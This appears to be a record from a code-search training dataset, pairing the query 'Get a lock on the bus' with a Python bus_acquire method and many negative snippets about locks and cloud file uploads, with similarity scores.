source_file_name, destination_blob_name):\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_name)\n\n print(\n \"File {} uploaded to {}.\".format(\n source_file_name, destination_blob_name\n )\n )", "def _openstack_file_upload_handler(self, real_file_path, file_path, file_name, **kwargs):\r\n\r\n container = kwargs.get('container', None)\r\n connection = kwargs.get('connection', None)\r\n\r\n if container is None:\r\n raise TypeError('container argument is required')\r\n\r\n if connection is None:\r\n raise TypeError('connection argument is required')\r\n\r\n object_key = (os.path.relpath(file_path, '/') + '/' + file_name).replace('\\\\', '/')\r\n if not object_key.startswith('/'):\r\n object_key = '/' + object_key\r\n\r\n remove_from_key = kwargs.get('remove_from_key', None)\r\n if remove_from_key is not None:\r\n object_key = object_key.replace(remove_from_key, '')\r\n\r\n prefix = kwargs.get('prefix', '')\r\n if prefix is None:\r\n prefix = ''\r\n if prefix != '' and not prefix.endswith('/'):\r\n prefix += '/'\r\n\r\n object_key = prefix + object_key\r\n\r\n real_file_path = real_file_path.replace('\\\\', '/')\r\n self._upload_file_to_container(container, object_key, real_file_path, connection)", "def upload_file(file_name, bucket_name, object_name=None):\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = os.path.basename(file_name)\n\n try:\n # Upload the file\n response = s3.upload_file(file_name, bucket_name, object_name)\n # Get list of files in bucket to confirm\n describe_objects(bucket_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def upload_file(file_name, bucket, object_name=None):\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n try:\n response = s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def file_upload(self, bucket_id, file_path, tmp_file_path):\n\n self.__logger.debug('Upload %s in bucket %s', file_path, bucket_id)\n self.__logger.debug('Temp folder %s', tmp_file_path)\n\n bname = os.path.split(file_path)[1] # File name\n\n file_mime_type = 'text/plain'\n\n # Encrypt file\n self.__logger.debug('Encrypting file...')\n\n file_crypto_tools = FileCrypto()\n\n # File name of encrypted file\n file_name_ready_to_shard_upload = '%s.encrypted' % bname\n # Path where to save the encrypted file in temp dir\n file_path_ready = os.path.join(tmp_file_path,\n file_name_ready_to_shard_upload)\n self.__logger.debug('file_path_ready: %s', file_path_ready)\n\n # Begin file encryption\n file_crypto_tools.encrypt_file(\n 'AES',\n file_path,\n file_path_ready,\n self.client.password)\n\n self.fileisdecrypted_str = ''\n\n file_size = os.stat(file_path).st_size\n self.__logger.info('File encrypted')\n\n # Get the PUSH token from Storj Bridge\n self.__logger.debug('Get PUSH Token')\n\n push_token = None\n try:\n push_token = self.client.token_create(bucket_id, 'PUSH')\n except BridgeError as e:\n self.__logger.error(e)\n self.__logger.debug('PUSH token create exception')\n self.__logger.error('File not uploaded')\n return\n\n self.__logger.info('PUSH Token ID %s', push_token.id)\n\n # Get a frame\n self.__logger.debug('Frame')\n frame = None\n\n try:\n frame = self.client.frame_create()\n except BridgeError as e:\n self.__logger.error(e)\n self.__logger.debug('Unhandled exception while creating file \\\nstaging frame')\n self.__logger.error('File not uploaded')\n return\n\n self.__logger.info('frame.id = %s', frame.id)\n\n # Now generate shards\n self.__logger.debug('Sharding started...')\n shards_manager = model.ShardManager(filepath=file_path_ready,\n tmp_path=tmp_file_path)\n self.all_shards_count = len(shards_manager.shards)\n\n self.__logger.debug('Sharding ended...')\n\n self.__logger.info('There are %s shards', self.all_shards_count)\n\n # Calculate timeout\n self._calculate_timeout(shard_size=shards_manager.shards[0].size,\n mbps=1)\n\n # Upload shards\n mp = ThreadPool()\n res = mp.map(lambda n_s: self.upload_shard(\n n_s[1], n_s[0], frame, file_name_ready_to_shard_upload, tmp_file_path),\n enumerate(shards_manager.shards))\n\n self.__logger.debug('===== RESULTS =====')\n self.__logger.debug(res)\n if False in res or None in res:\n self.__logger.error('File not uploaded: shard %s not uploaded' %\n res.index(False))\n self.__logger.error('Exiting with errors')\n exit(1)\n # finish_upload\n self.__logger.debug('Generating HMAC...')\n\n # create file hash\n hash_sha512_hmac_b64 = self._prepare_bucket_entry_hmac(\n shards_manager.shards)\n hash_sha512_hmac = hashlib.sha224(str(\n hash_sha512_hmac_b64['SHA-512'])).hexdigest()\n\n self.__logger.debug('Now upload file')\n data = {\n 'x-token': push_token.id,\n 'x-filesize': str(file_size),\n 'frame': frame.id,\n 'mimetype': file_mime_type,\n 'filename': str(bname) + str(self.fileisdecrypted_str),\n 'hmac': {\n 'type': 'sha512',\n 'value': hash_sha512_hmac\n },\n }\n\n self.__logger.debug('Finishing upload')\n self.__logger.debug('Adding file %s to bucket...', bname)\n\n success = False\n try:\n # Post an upload_file request\n response = self.client._request(\n method='POST',\n path='/buckets/%s/files' % bucket_id,\n headers={\n 'x-token': push_token.id,\n 'x-filesize': str(file_size),\n },\n json=data,\n )\n success = True\n\n except BridgeError as e:\n self.__logger.error(e)\n self.__logger.debug('Unhandled bridge exception')\n\n if success:\n self.__logger.info('File uploaded successfully!')\n\n # Remove temp files\n try:\n # Remove shards\n file_shards = map(lambda i: '%s-%s' % (file_path_ready, i),\n range(1, self.all_shards_count + 1))\n self.__logger.debug('Remove shards %s' % file_shards)\n map(os.remove, file_shards)\n # Remove encrypted file\n self.__logger.debug('Remove encrypted file %s' % file_path_ready)\n os.remove(file_path_ready)\n except OSError as e:\n self.__logger.error(e)", "def put(self, file_path, key=None):\n try:\n key_name = key if key else os.path.basename(file_path)\n size = os.stat(file_path).st_size\n if size < 104857600: #100 mb\n k = Key(self.bucket)\n k.key = key_name\n sent = k.set_contents_from_filename(file_path)\n log.info('Uploading %s to S3 (%s)' % (key_name, self.bucket_name))\n return sent == size\n else:\n log.info('Multipart Uploading %s to S3 (%s)' % (key_name, self.bucket_name))\n mp = self.bucket.initiate_multipart_upload(key_name)\n chunk_size = 52428800\n chunk_count = int(math.ceil(size / float(chunk_size)))\n #Send the file parts, using FileChunkIO to create a file-like object\n # that points to a certain byte range within the original file. We\n # set bytes to never exceed the original file size.\n for i in range(chunk_count):\n offset = chunk_size * i\n bytes = min(chunk_size, size - offset)\n with FileChunkIO(file_path, 'r', offset=offset, bytes=bytes) as fp:\n mp.upload_part_from_file(fp, part_num=i + 1)\n # Finish the upload\n mp.complete_upload()\n return True\n except Exception, e:\n log.error('Failed to upload to S3 (%s)' % (self.bucket_name), exc_info=True)\n return False", "def upload_file(file_name, bucket, object_name=None):\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n s3_client = boto3.client('s3', aws_access_key_id='', aws_secret_access_key='')\n try:\n response = s3_client.upload_file(file_name, bucket, object_name, ExtraArgs={'ACL':'public-read'})\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def handle_upload(f, attrs):\n\n # chunked = False\n print 'UPLOAD DIRECTORY:', UPLOAD_DIRECTORY\n dest_folder = os.path.join(UPLOAD_DIRECTORY, attrs['qquuid'])\n dest = os.path.join(dest_folder, attrs['qqfilename'])\n save_upload(f, dest)", "def load_data_to_s3(frame_dir, preview_file_name, s3_bucket, frame_prefix, upload_frames, video_preview_prefix,\n working_dir):\n if upload_frames:\n count = 0\n frames_s3_prefix = frame_prefix + frame_dir.split('/')[-1]\n start = time.time()\n for frame in os.listdir(frame_dir):\n # this will upload the frame in vid_a/vid_a_000001.jpg to s3://bucket/frame-prefix/vid_a/vid_a_000001.jpg\n frame_local_path = os.path.join(frame_dir, frame)\n frame_s3_key = \"{}/{}\".format(frames_s3_prefix, frame)\n s3.Bucket(s3_bucket).upload_file(frame_local_path, frame_s3_key)\n count += 1\n if count % REPORT_STATUS == 0:\n logger.info(\"uploaded {} frames. \".format(count))\n logger.info(\"took {:10.4f} seconds to upload {} frames\".format(time.time() - start, REPORT_STATUS))\n start = time.time()\n logger.info(\"uploaded {} frames to s3://{}/{}\".format(count, s3_bucket, frames_s3_prefix))\n\n if preview_file_name is not None:\n preview_file_s3_key = video_preview_prefix + preview_file_name\n s3.Bucket(s3_bucket).upload_file(os.path.join(working_dir, preview_file_name), preview_file_s3_key)\n logger.info(\"uploaded preview to s3://{}/{}\".format(s3_bucket, preview_file_s3_key))", "def _upload_file_to_container(self, container, object_key, file_path, connection):\r\n data = open(file_path, 'rb')\r\n logger.debug('upload {file_path} to {container} {object_key}'.format(file_path=file_path, container=container,\r\n object_key=object_key))\r\n\r\n result = connection.object_store.upload_object(container=container,\r\n name=object_key,\r\n data=open(file_path, 'r'))\r\n\r\n logger.debug(result)", "def upload_file(cluster, girder_token, file, path):\n girder_client = GirderClient(apiUrl=cumulus.config.girder.baseUrl)\n girder_client.token = girder_token\n with get_connection(girder_token, cluster) as conn:\n conn.makedirs(os.path.dirname(path))\n _upload_file(conn, girder_client, file, path)", "def _upload_to_s3(filename):\n if not app.config.get('UPLOAD_SCREENSHOTS_TO_S3', False):\n return\n\n import boto\n from boto.s3.key import Key\n conn = boto.connect_s3()\n b = conn.get_bucket(app.config['S3_BUCKET'])\n k = Key(b)\n k.key = '{}/{}'.format(\n app.config.get('S3_FILES_PREFIX', 'sleepypuppy'),\n filename\n )\n k.set_contents_from_filename(\n \"{}/{}\".format(\n app.config['UPLOAD_FOLDER'],\n filename\n )\n )\n os.remove(\n \"{}/{}\".format(\n app.config['UPLOAD_FOLDER'],\n filename\n )\n )", "def upload_blob(bucket_name, source_file_name, destination_blob_name):\n # bucket_name = \"your-bucket-name\"\n # source_file_name = \"local/path/to/file\"\n # destination_blob_name = \"storage-object-name\"\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_name)\n\n print(\n \"File {} uploaded to {}.\".format(\n source_file_name, destination_blob_name\n )\n )" ]
[ "0.6746442", "0.6491204", "0.63522506", "0.6235617", "0.6157146", "0.61324275", "0.6127183", "0.6115192", "0.61045253", "0.6098759", "0.60934263", "0.6089703", "0.60668164", "0.60577595", "0.5977721", "0.5973843", "0.59473646", "0.5942112", "0.5934158", "0.5906467", "0.59060514", "0.59009403", "0.589082", "0.5860991", "0.58570814", "0.5855367", "0.5852083", "0.5844416", "0.5829742", "0.58231556", "0.58153045", "0.58133286", "0.5808229", "0.5795365", "0.579406", "0.57907224", "0.5786671", "0.57676554", "0.57515323", "0.5742465", "0.57394797", "0.5717029", "0.5716955", "0.57048297", "0.5687541", "0.56723785", "0.565599", "0.5640741", "0.56355613", "0.5635118", "0.5630258", "0.5628934", "0.5624051", "0.56192094", "0.5609027", "0.56047654", "0.5603055", "0.560212", "0.56020695", "0.55987006", "0.55763173", "0.5569162", "0.55557615", "0.55486333", "0.554798", "0.55467206", "0.55415547", "0.55248183", "0.5523339", "0.55164325", "0.5515865", "0.55072594", "0.5505801", "0.5504942", "0.5490117", "0.5487871", "0.5486259", "0.5484544", "0.5482749", "0.54804456", "0.54784274", "0.54757077", "0.5473381", "0.5472214", "0.5466865", "0.5462733", "0.5458692", "0.5457316", "0.5454151", "0.54535353", "0.54482275", "0.54283", "0.5424926", "0.5422325", "0.54194725", "0.54154944", "0.5412767", "0.5412148", "0.54054004", "0.5404316", "0.54020065" ]
0.0
-1
Get the state of the fsm
def get_state(self, node_uuid, index): return self.state
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def GetState(self):\r\n \r\n return self.state", "def getState():\n # TODO: this isn't nearly as meaningful as it used to be", "def getState(self):\r\n return self._get_SS_State()#self.currentState\r", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def get_state(self):\n return self.env.sim.get_state()", "def get_state(self):\n return self.state", "def get_state(self):\n return self.state", "def get_state(self, state):\n return state", "def return_state(self):\n\t\treturn self.state", "def getState(self) :\n return self.state", "def get_state(self):\n return self.controller.get_state()", "def get_state(self):\n pass", "def state(self) :\n\t\ttry :\n\t\t\treturn self._state\n\t\texcept Exception as e:\n\t\t\traise e", "def get_state(self,p):\n self._validate(p)\n return p.state()", "def getState(self):\r\n self.UpdateState()\r\n return self.cur_state", "def get_state(self):\n return self._state", "def get_state(self):\n return self._state", "def get_state(self):\n return self._state", "def get_state(self):\n return self._state", "def get_state(self):\n return self._state", "def _get_state(self):\n print(\"GET STATE\")\n res = self._send_command(\n \"RS;\",\n fb_required=True,\n res_pattern=\"STATE:\")\n # The received answer is supposed to be something like\n # STATE:0|1|-1\n state = int(res.split(':')[1])\n if state == PVDriver.IDLE:\n return \"IDLE\"\n elif state == PVDriver.MOVING:\n return \"MOVING\"\n else:\n return \"ERROR\"", "def get_state(self):\n self.request_state()\n e = self.get_event()\n if e.id != ID_STATE:\n raise GrblEventError(e)\n return e.data", "def getState(self):\n return self.state", "def getState(self):\n return self.state", "def getState(self):\n return self.state", "def get_state(self):\n raise NotImplementedError", "def get_state(self):\n raise NotImplementedError", "def get_state(self):\r\n alarm = self._alarm()\r\n return alarm.state", "def state(self):\n print(\"getter of variable state called\")\n return self._state", "def get_state(self):\n return ONEUP_STATES[self.state][0]" ]
[ "0.77134407", "0.76589096", "0.76107895", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7541505", "0.7517409", "0.7517409", "0.74390864", "0.74369746", "0.7416075", "0.7413919", "0.7335057", "0.7310263", "0.7279341", "0.72768843", "0.727576", "0.727576", "0.727576", "0.727576", "0.727576", "0.72707576", "0.7246396", "0.7232098", "0.7232098", "0.7232098", "0.72023994", "0.72023994", "0.71446645", "0.71196526", "0.7104393" ]
0.0
-1
Get a lock on the bus
def bus_acquire(self, blocking=True): if self._bus_lock.acquire(blocking): return True return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_lock(name):\n return _handler_locks[name]", "def get_lock():\n\n return multiprocessing.Lock()", "def get_lock(self, name, try_=False):\n lock = Lock(self, name, try_)\n with lock as got_lock:\n yield got_lock", "def get_lock(self):\n function_string = 'IFLOCK'\n self.scpi_comm(function_string)\n function_string = 'IFLOCK?'\n status = int(self.scpi_comm(function_string))\n return_message = \"\"\n if status == 0:\n return_message = \"Not successful\"\n if status == -1:\n return_message = \"Device already locked\"\n if status == 1:\n return_message = \"Lock acquired\"\n return return_message", "def get(name: str) -> RWLock:\n lock = RwLocks.by_name.get(name)\n if lock is None:\n lock = RwLocks.by_name[name] = RWLock()\n return lock", "def lock_object(self):\n return gevent.thread.allocate_lock()", "def __getattr__(self, name):\n return getattr(self._lock, name)", "def lock(self):\r\n return self._lock", "def lock(self):\n return self._lock", "def __call__(self, resource: LockResource, timeout: timedelta) -> Lock:", "def __getitem__(self, hashlock):\n return self.locked[hashlock]", "def get_lock(self):\n \n svc = \"urn:micasaverde-com:serviceId:DoorLock1\"\n if not svc in self.services:\n raise RuntimeError, \"Device doesn't support the service\"\n \n status = self.get_variable(svc, \"Status\")\n return status == 1", "def lock(self) -> TokenEKeyLock:\n return self._lock", "def create_lock() -> Lock:\n return Lock()", "def lock(self):\n print(\"DEPRECATED lock\")\n return self._operations.lock()", "def shared_lock(self):\n return self.lock(False)", "def bus_locked(self):\n return self._bus_lock.locked()", "def TryLock():\n now_time = datetime.datetime.utcnow()\n expire_time = now_time + self._expire_timedelta\n\n lock = db.get(self._lock_key)\n if lock is None:\n lock = LockModel(key_name=self._lock_key.name(),\n expire_time=expire_time, lock_data=lock_data)\n lock.put()\n return lock\n elif lock.expire_time < now_time:\n lock.expire_time = expire_time\n lock.put()\n return lock\n return None", "def _try_acquire_listgen_lock(self):\n with self._conn as conn, conn.cursor() as cursor:\n cursor.execute('SELECT pg_try_advisory_lock(%s::BIGINT)', [self._lock_key])\n return cursor.fetchone()[0]", "def get_named_lock(self, name):\r\n # Global critical section\r\n self._named_locks_lock.acquire()\r\n if not name in self._named_locks:\r\n self._named_locks[name] = BoundedSemaphore()\r\n self._named_locks_lock.release()\r\n # End global critical section\r\n\r\n self.log.debug(\"Grabbing named lock (%s)\" % name)\r\n self._named_locks[name].acquire()\r\n self.log.debug(\"Got named lock (%s)\" % name)", "def _get_lock(self, hash_bytes: bytes) -> Optional[Lock]:\n if not self._should_lock:\n return None\n\n with self._weakref_lock:\n lock = self._weakref_lock_per_hash.get(hash_bytes, None)\n if lock is None:\n lock = Lock()\n self._weakref_lock_per_hash[hash_bytes] = lock\n return lock", "def svn_fs_get_lock(*args):\r\n return _fs.svn_fs_get_lock(*args)", "def acquire(self, retry=True):\n lock_conductor_id = objects.BayLock.create(self.bay.uuid,\n self.conductor_id)\n if lock_conductor_id is None:\n LOG.debug(\"Conductor %(conductor)s acquired lock on bay \"\n \"%(bay)s\" % {'conductor': self.conductor_id,\n 'bay': self.bay.uuid})\n return\n\n if (lock_conductor_id == self.conductor_id or\n self.conductor_alive(self.context, lock_conductor_id)):\n LOG.debug(\"Lock on bay %(bay)s is owned by conductor \"\n \"%(conductor)s\" % {'bay': self.bay.uuid,\n 'conductor': lock_conductor_id})\n raise exception.OperationInProgress(bay_name=self.bay.name)\n else:\n LOG.info(_LI(\"Stale lock detected on bay %(bay)s. Conductor \"\n \"%(conductor)s will attempt to steal the lock\"),\n {'bay': self.bay.uuid, 'conductor': self.conductor_id})\n\n result = objects.BayLock.steal(self.bay.uuid,\n lock_conductor_id,\n self.conductor_id)\n\n if result is None:\n LOG.info(_LI(\"Conductor %(conductor)s successfully stole the \"\n \"lock on bay %(bay)s\"),\n {'conductor': self.conductor_id,\n 'bay': self.bay.uuid})\n return\n elif result is True:\n if retry:\n LOG.info(_LI(\"The lock on bay %(bay)s was released while \"\n \"conductor %(conductor)s was stealing it. \"\n \"Trying again\"),\n {'bay': self.bay.uuid,\n 'conductor': self.conductor_id})\n return self.acquire(retry=False)\n else:\n new_lock_conductor_id = result\n LOG.info(_LI(\"Failed to steal lock on bay %(bay)s. \"\n \"Conductor %(conductor)s stole the lock first\"),\n {'bay': self.bay.uuid,\n 'conductor': new_lock_conductor_id})\n\n raise exception.OperationInProgress(bay_name=self.bay.name)", "def tarantool_lock(self):\n if self._lockinst is None:\n self._lockinst = threading.Lock()\n\n return self._lockinst", "def locked_get(self):\n credential = self._multistore._get_credential(self._key)\n if credential:\n credential.set_store(self)\n return credential", "def lock(self, nReserved):\n\t\treturn Job(SDK.PrlVm_Lock(self.handle, nReserved)[0])", "def getAccessLock(self):\n return self._dataLock", "def acquire_lock_1(force, lock_file=None):\n if lock_file is None:\n lock_file = config.LOCK_FILE\n lock = Lock(lock_file, LOCK_LIFETIME)\n try:\n lock.lock(timedelta(seconds=0.1))\n return lock\n except TimeOutError:\n if not force:\n raise\n # Force removal of lock first.\n lock.disown()\n hostname, pid, tempfile = lock.details\n os.unlink(lock_file)\n return acquire_lock_1(force=False)", "def unlocked():\r\n return Lock(None)", "def acquire(self, blocking=True, shared=False):", "def acquire(self, wait=True):\n return self.__lock.acquire(wait)", "def walletlock(self):\n return self.proxy.walletlock()", "def acquire(self):\n retries = [0]\n self._acquire_start_seconds = self._reactor.seconds()\n\n def log_lock_acquired(result):\n self._lock_acquired_seconds = self._reactor.seconds()\n seconds = self._lock_acquired_seconds - self._acquire_start_seconds\n self._log.msg('Acquired lock in {0} seconds'.format(seconds),\n lock_acquire_time=seconds, **self._log_kwargs)\n return result\n\n def acquire_lock():\n d = self._write_lock()\n d.addCallback(self._read_lock)\n d.addCallback(self._verify_lock)\n if self._log:\n d.addCallback(log_lock_acquired)\n d.addErrback(lock_not_acquired)\n return d\n\n def lock_not_acquired(failure):\n failure.trap(BusyLockError, NoLockClaimsError)\n retries[0] += 1\n if retries[0] <= self._max_retry:\n return task.deferLater(self._reactor, self._retry_wait, acquire_lock)\n else:\n return failure\n\n def log_lock_acquire_failure(failure):\n if self._log:\n seconds = self._reactor.seconds() - self._acquire_start_seconds\n self._log.msg(\n 'Could not acquire lock in {0} seconds due to {1}'.format(seconds, failure),\n lock_acquire_fail_time=seconds, reason=failure, **self._log_kwargs)\n return failure\n\n return acquire_lock().addErrback(log_lock_acquire_failure)", "def read_lock(self, timeout=None, _id=None):\n me = _id or (current_process().ident, current_thread().ident)\n\n # noinspection PyMethodParameters,PyUnusedLocal\n class ReadWithLock (object):\n\n def __enter__(_self):\n self.acquireRead(timeout, me)\n\n def __exit__(_self, *args):\n self.releaseRead(me)\n\n return ReadWithLock()", "def __enter__(self):\n return self._lock.__enter__()", "def _get_locked(self, mountpoint):\n # This dance is because we delete locks. We need to be sure that the\n # lock we hold does not belong to an object which has been deleted.\n # We do this by checking that mountpoint still refers to this object\n # when we hold the lock. This is safe because:\n # * we only delete an object from mountpounts whilst holding its lock\n # * mountpoints is a defaultdict which will atomically create a new\n # object on access\n while True:\n mount = self.mountpoints[mountpoint]\n with mount.lock:\n if self.mountpoints[mountpoint] is mount:\n yield mount\n break", "def rlock_object(self):\n return RLock()", "def acquire_lock(force):\n try:\n lock = acquire_lock_1(force)\n return lock\n except TimeOutError:\n status, lock = master_state()\n if status is WatcherState.conflict:\n # Hostname matches and process exists.\n message = _(\"\"\"\\\nThe master lock could not be acquired because it appears as though another\nmaster is already running.\"\"\")\n elif status is WatcherState.stale_lock:\n # Hostname matches but the process does not exist.\n program = sys.argv[0] # noqa: F841\n message = _(\"\"\"\\\nThe master lock could not be acquired. It appears as though there is a stale\nmaster lock. Try re-running $program with the --force flag.\"\"\")\n elif status is WatcherState.host_mismatch:\n # Hostname doesn't even match.\n hostname, pid, tempfile = lock.details\n message = _(\"\"\"\\\nThe master lock could not be acquired, because it appears as if some process\non some other host may have acquired it. We can't test for stale locks across\nhost boundaries, so you'll have to clean this up manually.\n\nLock file: $config.LOCK_FILE\nLock host: $hostname\n\nExiting.\"\"\")\n else:\n assert status is WatcherState.none, (\n 'Invalid enum value: ${0}'.format(status))\n hostname, pid, tempfile = lock.details\n message = _(\"\"\"\\\nFor unknown reasons, the master lock could not be acquired.\n\n\nLock file: $config.LOCK_FILE\nLock host: $hostname\n\nExiting.\"\"\")\n config.options.parser.error(message)", "def getLockByID(self, lockid):\n assert isinstance(lockid, (locks.MasterLock, locks.SlaveLock))\n if not lockid in self.locks:\n self.locks[lockid] = lockid.lockClass(lockid)\n # if the master.cfg file has changed maxCount= on the lock, the next\n # time a build is started, they'll get a new RealLock instance. Note\n # that this requires that MasterLock and SlaveLock (marker) instances\n # be hashable and that they should compare properly.\n return self.locks[lockid]", "def lock(self):\n from .services import locking\n\n return locking.lock_quota(self)", "def get(self, key, lock):\n raise NotImplementedError()", "def read_acquire(self):\n self.is_locked = True\n self.rwlock = RWLock().read_acquire()", "def RLock():\n import threading\n return threading.RLock()", "def __createLock(self):\n lockUrl = self.metaData.getLink(\"lock\")\n assert lockUrl is not None\n\n lockBody = json.dumps({\"lockIntent\" : \"lockedForEdit\"})\n header = self._baseHeader.copy()\n header['Content-type'] = \"application/vnd.huddle.data+json\"\n lockResponse = self._adapter.postRequest(lockUrl, header, lockBody)\n\n return lockResponse", "def acquire_lock (self):\n\n self._exec (self.select)\n self.locked = True", "def lock(self):\n raise NotImplementedError", "def acquire(self):\n waiter = Future()\n if self.redis_client.set(self.key, self.value, ex=self.ttl, nx=True):\n waiter.set_result(locks._ReleasingContextManager(self))\n else:\n waiter.set_exception(DDosError(\"被暴击了\"))\n # def on_timeout():\n # waiter.set_exception(gen.TimeoutError())\n # io_loop = ioloop.IOLoop.current()\n # timeout_handle = io_loop.add_timeout(timeout, on_timeout)\n # waiter.add_done_callback(\n # lambda _: io_loop.remove_timeout(timeout_handle))\n return waiter", "def AcquireLock(self, lock_data=None):\n if lock_data is None: lock_data = {}\n lock_data = LockData(lock_data)\n\n def TryLock():\n \"\"\"Function to acquire lock within a transaction.\n\n Returns:\n Returns any shared data that might have been stored in the lock.\n \"\"\"\n now_time = datetime.datetime.utcnow()\n expire_time = now_time + self._expire_timedelta\n\n lock = db.get(self._lock_key)\n if lock is None:\n lock = LockModel(key_name=self._lock_key.name(),\n expire_time=expire_time, lock_data=lock_data)\n lock.put()\n return lock\n elif lock.expire_time < now_time:\n lock.expire_time = expire_time\n lock.put()\n return lock\n return None\n\n trials = 0\n self._acquired_lock = None\n while self._acquired_lock is None and (self._try_count == 0 or\n trials < self._try_count):\n trials += 1\n\n try:\n self._acquired_lock = db.run_in_transaction(TryLock)\n except db.TransactionFailedError:\n pass\n\n if self._acquired_lock is None:\n time.sleep(self._sleep_seconds)\n\n if self._acquired_lock is None:\n logging.info('failed attempt to acquire lock %s', self._lock_key.name())\n raise errors.LockAcquireFailure('Failed to acquire lock %s' %\n self._lock_key.name())\n\n return self._acquired_lock.lock_data.data", "def test_lock(self):\n lock = self.tx_client.Lock(\"xyzzy\", identifier=\"iddqd\")\n self.assertIdentical(lock._reactor, self.reactor)\n self.assertIdentical(lock._pool, self.pool)\n\n self.assertEqual(lock.path, \"xyzzy\")\n self.assertEqual(lock.identifier, \"iddqd\")", "def acquire(self, timeout=None):\r\n try:\r\n open(self.unique_name, \"wb\").close()\r\n except IOError:\r\n raise LockFailed\r\n\r\n end_time = time.time()\r\n if timeout is not None and timeout > 0:\r\n end_time += timeout\r\n\r\n while True:\r\n # Try and create a hard link to it.\r\n try:\r\n os.link(self.unique_name, self.lock_file)\r\n except OSError:\r\n # Link creation failed. Maybe we've double-locked?\r\n nlinks = os.stat(self.unique_name).st_nlink\r\n if nlinks == 2:\r\n # The original link plus the one I created == 2. We're\r\n # good to go.\r\n return\r\n else:\r\n # Otherwise the lock creation failed.\r\n if timeout is not None and time.time() > end_time:\r\n os.unlink(self.unique_name)\r\n if timeout > 0:\r\n raise LockTimeout\r\n else:\r\n raise AlreadyLocked\r\n time.sleep(timeout is not None and timeout/10 or 0.1)\r\n else:\r\n # Link creation succeeded. We're good to go.\r\n return", "def get_lock():\n fh = None\n # We don't do anything unless --synchronous_name is set.\n if args.synchronous_name is not None:\n if not os.path.isdir(args.synchronization_dir):\n log('--synchronization_dir does not exist, attempting to create')\n os.mkdir(args.synchronization_dir)\n\n lock = os.path.join(args.synchronization_dir, args.synchronous_name)\n fh = open(lock, 'w')\n log('Acquiring lock on %s' % lock)\n if args.nonblocking:\n try:\n fcntl.flock(fh, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError:\n log('We did not get the lock but --nonblocking is true; '\n 'exiting successfully')\n fh.close()\n sys.exit(0)\n else:\n # Wait indefinitely. Hopefully there is a timeout on the synchro.py\n # holding the lock.\n fcntl.flock(fh, fcntl.LOCK_EX)\n 